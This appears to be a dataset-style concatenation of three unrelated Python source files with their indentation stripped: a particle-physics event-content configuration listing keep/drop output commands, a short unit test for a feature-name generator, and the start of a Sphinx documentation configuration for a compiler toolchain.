AODEventContent.outputCommands.extend(RecoLocalTrackerAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoLocalMuonAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoLocalCaloAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoEcalAOD.outputCommands)
AODEventContent.outputCommands.extend(TrackingToolsAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoTrackerAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoJetsAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoMETAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoMuonAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoBTauAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoBTagAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoTauTagAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoVertexAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoEgammaAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoParticleFlowAOD.outputCommands)
AODEventContent.outputCommands.extend(BeamSpotAOD.outputCommands)
AODEventContent.outputCommands.extend(L1TriggerAOD.outputCommands)
AODEventContent.outputCommands.extend(HLTriggerAOD.outputCommands)
AODEventContent.outputCommands.extend(MEtoEDMConverterAOD.outputCommands)
AODEventContent.outputCommands.extend(EvtScalersAOD.outputCommands)
AODEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands)
AODEventContent.outputCommands.extend(TcdsEventContent.outputCommands)
AODEventContent.outputCommands.extend(CommonEventContent.outputCommands)
ctpps_2016.toModify(AODEventContent, outputCommands = AODEventContent.outputCommands + RecoCTPPSAOD.outputCommands)
RAWAODEventContent.outputCommands.extend(AODEventContent.outputCommands)
RAWAODEventContent.outputCommands.extend(cms.untracked.vstring(
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'
))
RAWSIMEventContent.outputCommands.extend(RAWEventContent.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands)
RAWSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands)
RAWSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands)
RAWSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands)
RAWSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands)
RAWSIMHLTEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands)
RAWSIMHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands)
GENRAWEventContent.outputCommands.extend(RAWEventContent.outputCommands)
GENRAWEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimTrackerRAW.outputCommands)
GENRAWEventContent.outputCommands.extend(SimMuonRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimGeneralRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands)
GENRAWEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands)
GENRAWEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands)
GENRAWEventContent.outputCommands.extend(IOMCRAW.outputCommands)
GENRAWEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands)
GENRAWEventContent.outputCommands.extend(CommonEventContent.outputCommands)
PREMIXEventContent.outputCommands.extend(SimGeneralRAW.outputCommands)
PREMIXEventContent.outputCommands.extend(IOMCRAW.outputCommands)
PREMIXEventContent.outputCommands.extend(CommonEventContent.outputCommands)
PREMIXEventContent.outputCommands.extend(SimTrackerPREMIX.outputCommands)
PREMIXEventContent.outputCommands.extend(SimCalorimetryPREMIX.outputCommands)
PREMIXEventContent.outputCommands.extend(SimFastTimingPREMIX.outputCommands)
PREMIXEventContent.outputCommands.extend(SimMuonPREMIX.outputCommands)
PREMIXEventContent.outputCommands.extend(SimGeneralPREMIX.outputCommands)
fastSim.toModify(PREMIXEventContent, outputCommands = PREMIXEventContent.outputCommands+fastSimEC.extraPremixContent)
PREMIXRAWEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands)
PREMIXRAWEventContent.outputCommands.append('keep CrossingFramePlaybackInfoNew_*_*_*')
PREMIXRAWEventContent.outputCommands.append('drop CrossingFramePlaybackInfoNew_mix_*_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_MergedTrackTruth_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_StripDigiSimLink_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_PixelDigiSimLink_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_MuonCSCStripDigiSimLinks_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_MuonCSCWireDigiSimLinks_*')
PREMIXRAWEventContent.outputCommands.append('keep *_*_RPCDigiSimLink_*')
PREMIXRAWEventContent.outputCommands.append('keep DTLayerIdDTDigiSimLinkMuonDigiCollection_*_*_*')
fastSim.toModify(PREMIXEventContent, outputCommands = PREMIXEventContent.outputCommands+fastSimEC.extraPremixContent)
REPACKRAWSIMEventContent.outputCommands.extend(REPACKRAWEventContent.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands)
REPACKRAWSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands)
RECOSIMEventContent.outputCommands.extend(RECOEventContent.outputCommands)
RECOSIMEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimTrackerRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimMuonRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(SimGeneralRECO.outputCommands)
RECOSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
AODSIMEventContent.outputCommands.extend(AODEventContent.outputCommands)
AODSIMEventContent.outputCommands.extend(GeneratorInterfaceAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimG4CoreAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimTrackerAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimMuonAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimCalorimetryAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimFastTimingAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(RecoGenJetsAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(RecoGenMETAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(SimGeneralAOD.outputCommands)
AODSIMEventContent.outputCommands.extend(MEtoEDMConverterAOD.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(RAWRECOEventContent.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimTrackerRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimMuonRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(SimGeneralRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
RAWRECOSIMHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands)
RAWRECODEBUGHLTEventContent.outputCommands.extend(RAWRECOSIMHLTEventContent.outputCommands)
RAWRECODEBUGHLTEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands)
RAWRECODEBUGHLTEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands)
FEVTEventContent.outputCommands.extend(RAWEventContent.outputCommands)
FEVTEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoEcalRECO.outputCommands)
FEVTEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoJetsRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoMETRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoMuonRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoBTauRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoBTagRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoVertexRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands)
FEVTEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands)
FEVTEventContent.outputCommands.extend(BeamSpotRECO.outputCommands)
FEVTEventContent.outputCommands.extend(L1TriggerRECO.outputCommands)
FEVTEventContent.outputCommands.extend(HLTriggerRECO.outputCommands)
FEVTEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
FEVTEventContent.outputCommands.extend(EvtScalersRECO.outputCommands)
FEVTEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands)
FEVTEventContent.outputCommands.extend(TcdsEventContent.outputCommands)
FEVTEventContent.outputCommands.extend(CommonEventContent.outputCommands)
FEVTEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands)
ctpps_2016.toModify(FEVTEventContent, outputCommands = FEVTEventContent.outputCommands + RecoCTPPSFEVT.outputCommands)
FEVTHLTALLEventContent.outputCommands.extend(FEVTEventContent.outputCommands)
FEVTHLTALLEventContent.outputCommands.append('keep *_*_*_HLT')
FEVTSIMEventContent.outputCommands.extend(RAWEventContent.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands)
FEVTSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands)
FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands)
FEVTSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoEcalRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoJetsRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoMETRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoMuonRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoBTauRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoBTagRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoVertexRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(BeamSpotRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(L1TriggerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(HLTriggerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimTrackerRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimMuonRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(SimGeneralRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(EvtScalersRECO.outputCommands)
FEVTSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands)
FEVTSIMEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands)
FEVTSIMEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands)
FEVTSIMEventContent.outputCommands.extend(TcdsEventContent.outputCommands)
RAWDEBUGEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands)
RAWDEBUGEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands)
RAWDEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands)
RAWDEBUGEventContent.outputCommands.extend(L1TriggerRAWDEBUG.outputCommands)
RAWDEBUGHLTEventContent.outputCommands.extend(RAWDEBUGEventContent.outputCommands)
RAWDEBUGHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(FEVTSIMEventContent.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(L1TriggerFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimTrackerFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimMuonFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimCalorimetryFEVTDEBUG.outputCommands)
FEVTDEBUGEventContent.outputCommands.extend(SimFastTimingFEVTDEBUG.outputCommands)
FEVTDEBUGHLTEventContent.outputCommands.extend(FEVTDEBUGEventContent.outputCommands)
FEVTDEBUGHLTEventContent.outputCommands.extend(HLTDebugFEVT.outputCommands)
FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_MergedTrackTruth_*')
FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_StripDigiSimLink_*')
FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_PixelDigiSimLink_*')
RECODEBUGEventContent.outputCommands.extend(RECOSIMEventContent.outputCommands)
RECODEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands)
RECODEBUGEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands)
from Configuration.ProcessModifiers.premix_stage2_cff import premix_stage2
from Configuration.Eras.Modifier_phase2_tracker_cff import phase2_tracker
(premix_stage2 & phase2_tracker).toModify(FEVTDEBUGHLTEventContent, outputCommands = FEVTDEBUGHLTEventContent.outputCommands+[
'keep *_*_Phase2OTDigiSimLink_*'
])
from Configuration.Eras.Modifier_phase2_muon_cff import phase2_muon
(premix_stage2 & phase2_muon).toModify(FEVTDEBUGHLTEventContent, outputCommands = FEVTDEBUGHLTEventContent.outputCommands+[
'keep *_*_GEMDigiSimLink_*',
'keep *_*_GEMStripDigiSimLink_*',
'keep *_*_ME0DigiSimLink_*',
'keep *_*_ME0StripDigiSimLink_*',
])
REPACKRAWSIMEventContent.outputCommands.extend(['drop FEDRawDataCollection_source_*_*',
'drop FEDRawDataCollection_rawDataCollector_*_*'])
REPACKRAWEventContent.outputCommands.extend(['drop FEDRawDataCollection_source_*_*',
'drop FEDRawDataCollection_rawDataCollector_*_*'])
#from modules in Configuration.StandardSequence.Generator_cff fixGenInfo
REGENEventContent = cms.PSet(
inputCommands=cms.untracked.vstring(
'keep *',
'drop *_genParticles_*_*',
'drop *_genParticlesForJets_*_*',
'drop *_kt4GenJets_*_*',
'drop *_kt6GenJets_*_*',
'drop *_iterativeCone5GenJets_*_*',
'drop *_ak4GenJets_*_*',
'drop *_ak7GenJets_*_*',
'drop *_ak8GenJets_*_*',
'drop *_ak4GenJetsNoNu_*_*',
'drop *_ak8GenJetsNoNu_*_*',
'drop *_genCandidatesForMET_*_*',
'drop *_genParticlesForMETAllVisible_*_*',
'drop *_genMetCalo_*_*',
'drop *_genMetCaloAndNonPrompt_*_*',
'drop *_genMetTrue_*_*',
'drop *_genMetIC5GenJs_*_*'
)
)
def SwapKeepAndDrop(l):
r=[]
for item in l:
if 'keep ' in item:
r.append(item.replace('keep ','drop '))
elif 'drop ' in item:
r.append(item.replace('drop ','keep '))
return r
RESIMEventContent = cms.PSet(
inputCommands=cms.untracked.vstring('drop *')
)
RESIMEventContent.inputCommands.extend(IOMCRAW.outputCommands)
RESIMEventContent.inputCommands.extend(GeneratorInterfaceRAW.outputCommands)
#RESIMEventContent.inputCommands.extend(SwapKeepAndDrop(SimG4CoreRAW.outputCommands))
#RESIMEventContent.inputCommands.extend(SwapKeepAndDrop(GeneratorInterfaceRAW.outputCommands))
REDIGIEventContent = cms.PSet(
inputCommands=cms.untracked.vstring('drop *')
)
REDIGIEventContent.inputCommands.extend(SimG4CoreRAW.outputCommands)
REDIGIEventContent.inputCommands.extend(IOMCRAW.outputCommands)
REDIGIEventContent.inputCommands.extend(GeneratorInterfaceRAW.outputCommands)
REDIGIEventContent.inputCommands.append('drop *_randomEngineStateProducer_*_*')
########### and mini AOD
#
# MiniAOD is a bit special: the files tend to be so small that letting
# ROOT automatically determine when to flush is a surprisingly big overhead.
#
MINIAODEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(-900),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
MINIAODSIMEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(-900),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
MINIGENEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(15*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
from PhysicsTools.PatAlgos.slimming.slimming_cff import MicroEventContent,MicroEventContentMC,MicroEventContentGEN
MINIAODEventContent.outputCommands.extend(MicroEventContent.outputCommands)
MINIAODSIMEventContent.outputCommands.extend(MicroEventContentMC.outputCommands)
MINIGENEventContent.outputCommands.extend(MicroEventContentGEN.outputCommands)
#### RAW+miniAOD
RAWMINIAODEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
RAWMINIAODSIMEventContent= cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
RAWMINIAODEventContent.outputCommands.extend(MicroEventContent.outputCommands)
RAWMINIAODEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
RAWMINIAODEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
RAWMINIAODSIMEventContent.outputCommands.extend(MicroEventContentMC.outputCommands)
RAWMINIAODSIMEventContent.outputCommands.extend(SimG4CoreHLTAODSIM.outputCommands)
RAWMINIAODSIMEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
RAWMINIAODSIMEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
RAWMINIAODEventContent.outputCommands.extend(cms.untracked.vstring(
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'
))
RAWMINIAODSIMEventContent.outputCommands.extend(cms.untracked.vstring(
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'
))
#
#
# RAWSIM Data Tier definition
# Meant as means to temporarily hold the RAW + AODSIM information as to allow the
# L1+HLT to be rerun at a later time.
#
RAWAODSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
RAWAODSIMEventContent.outputCommands.extend(AODSIMEventContent.outputCommands)
RAWAODSIMEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
RAWAODSIMEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
RAWAODSIMEventContent.outputCommands.extend(SimG4CoreHLTAODSIM.outputCommands)
# in fastsim, normal digis are edaliases of simdigis
# drop the simdigis to avoid complaints from the outputmodule related to duplicated branches
for _entry in [FEVTDEBUGHLTEventContent,FEVTDEBUGEventContent,RECOSIMEventContent,AODSIMEventContent,RAWAODSIMEventContent]:
fastSim.toModify(_entry, outputCommands = _entry.outputCommands + fastSimEC.dropSimDigis)
for _entry in [MINIAODEventContent, MINIAODSIMEventContent]:
fastSim.toModify(_entry, outputCommands = _entry.outputCommands + fastSimEC.dropPatTrigger)
for _entry in [FEVTDEBUGEventContent,FEVTDEBUGHLTEventContent,FEVTEventContent]:
phase2_tracker.toModify(_entry, outputCommands = _entry.outputCommands + [
'keep Phase2TrackerDigiedmDetSetVector_mix_*_*',
'keep *_TTClustersFromPhase2TrackerDigis_*_*',
'keep *_TTStubsFromPhase2TrackerDigis_*_*'
])
from Configuration.Eras.Modifier_run2_GEM_2017_cff import run2_GEM_2017
from Configuration.Eras.Modifier_run3_GEM_cff import run3_GEM
from Configuration.Eras.Modifier_phase2_muon_cff import phase2_muon
from Configuration.Eras.Modifier_pp_on_AA_2018_cff import pp_on_AA_2018
for _entry in [FEVTDEBUGEventContent,FEVTDEBUGHLTEventContent,FEVTEventContent]:
run2_GEM_2017.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*'])
run3_GEM.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*'])
phase2_muon.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*'])
pp_on_AA_2018.toModify(_entry, outputCommands = _entry.outputCommands + ['keep FEDRawDataCollection_rawDataRepacker_*_*'])
from RecoLocalFastTime.Configuration.RecoLocalFastTime_EventContent_cff import RecoLocalFastTimeFEVT, RecoLocalFastTimeRECO, RecoLocalFastTimeAOD
from Configuration.Eras.Modifier_phase2_timing_layer_cff import phase2_timing_layer
def _addOutputCommands(mod, newCommands):
phase2_timing_layer.toModify(mod, outputCommands = mod.outputCommands + newCommands.outputCommands)
_addOutputCommands(FEVTDEBUGEventContent,RecoLocalFastTimeFEVT)
_addOutputCommands(FEVTDEBUGHLTEventContent,RecoLocalFastTimeFEVT)
_addOutputCommands(FEVTEventContent,RecoLocalFastTimeFEVT)
_addOutputCommands(RECOSIMEventContent,RecoLocalFastTimeRECO)
_addOutputCommands(AODSIMEventContent,RecoLocalFastTimeAOD)
from RecoMTD.Configuration.RecoMTD_EventContent_cff import RecoMTDFEVT, RecoMTDRECO, RecoMTDAOD
_addOutputCommands(FEVTDEBUGEventContent,RecoMTDFEVT)
_addOutputCommands(FEVTDEBUGHLTEventContent,RecoMTDFEVT)
_addOutputCommands(FEVTEventContent,RecoMTDFEVT)
_addOutputCommands(RECOSIMEventContent,RecoMTDRECO)
_addOutputCommands(AODSIMEventContent,RecoMTDAOD)
|
py | 7dfa1fc52977f0834ffac0629ebc18e3b843f785 | import unittest
from source.code.utils import generate_features_names
class TestUtils(unittest.TestCase):
def test_generate_features_names(self):
num_features = ['with', 'height', 'age']
bin_features = ['gender']
cat_features = {'marital_status': 5, 'home_type': 3}
res = generate_features_names(bin_features, cat_features, num_features)
self.assertEqual(12, len(res), 'Something is wrong!!!')
|
py | 7dfa214002680b97826398fc37f9270dfb27cbab | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
## _
## | |
## __| | __ ___ ___ ___
## / _` |/ _` \ \ /\ / / '_ |
## | (_| | (_| |\ V V /| | | |
## \__,_|\__,_| \_/\_/ |_| |_| - Compiler Toolchain
##
##
## This file is distributed under the MIT License (MIT).
## See LICENSE.txt for details.
##
##===------------------------------------------------------------------------------------------===##
# DAWN documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 27 13:56:47 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('_extension'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['cmake', 'edit_on_github']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'yoda'
copyright = '2017, ETH Zurich and MeteoSwiss'
author = 'Fabian Thuering, Carlos Osuna and Tobias Wicky'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ""
# The full version, including alpha/beta/rc tags.
release = ""
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
